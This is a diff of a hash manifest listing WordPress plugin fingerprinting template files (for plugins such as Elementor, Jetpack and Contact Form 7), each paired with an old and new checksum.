-http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f -http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 -http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 -http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad -http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f -http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 -http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af -http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a -http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 +http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc +http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 +http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 +http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b +http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 +http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 +http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 +http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 +http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f +http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b +http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f +http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 +http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 +http/technologies/wordpress/plugins/cloudflare.yaml:431bca4737941e71c01f7ab9ce8f7fc45c7670a2 +http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff +http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a +http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e +http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f +http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af +http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb +http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e +http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 +http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 +http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 +http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 +http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a +http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 +http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab -http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 -http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 -http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e -http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba -http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d -http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 -http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 -http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca -http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:d43e8f2af19c16d5e9d768be20676774bb14653f -http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 -http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc -http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 -http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 -http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 -http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 -http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 -http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 -http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 -http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b -http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f -http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde -http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a -http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac -http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 -http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 -http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b -http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 -http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 -http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 -http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb -http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 -http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 -http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd -http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb -http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 -http/technologies/wordpress/plugins/ml-slider.yaml:3a91387c9a73aa27dcfe61ae0f6c73803d90410a -http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf -http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 -http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 -http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af -http/technologies/wordpress/plugins/otter-blocks.yaml:dd77f96680874688c4f833694d8282493a4b3ba8 -http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 -http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 -http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 +http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 +http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb +http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 +http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f +http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 +http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 +http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 +http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 +http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:4ea09b17d82c48189149274385a07113cf6c77f6 +http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b +http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b +http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 +http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:2c6eb5a2958fa71c5f9b9f3c9cc3f923957ae653 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 +http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 +http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb +http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c +http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 +http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 +http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b +http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 +http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e +http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c +http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 +http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 +http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 +http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 +http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b +http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea +http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d +http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd +http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f +http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 +http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 +http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e +http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 +http/technologies/wordpress/plugins/ml-slider.yaml:02dff647f100193d671151fb1e67b2f5ddcc8a53 +http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f +http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 +http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 +http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 +http/technologies/wordpress/plugins/otter-blocks.yaml:323522fa2b0c8af98838b2347a51f91ceefc2067 +http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 +http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 +http/technologies/wordpress/plugins/photo-gallery.yaml:382590e69485fae675191962251cb3c5bd385aba http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c -http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d -http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 -http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e -http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 -http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 -http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 -http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 -http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 -http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd -http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 -http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:0869b92e5fc5980a1d9af28e866cba52048985d7 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a +http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f +http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 +http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a +http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa +http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da +http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 +http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad +http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 +http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 +http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 +http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf +http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:db7d02819167f56a4ad9747b0f63648c9c1c787c +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751 -http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd -http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c +http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 +http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69 -http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc -http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b -http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928 -http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a -http/technologies/wordpress/plugins/under-construction-page.yaml:262bf6f78177ba5b569e23f498beeef8f35cc453 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f +http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 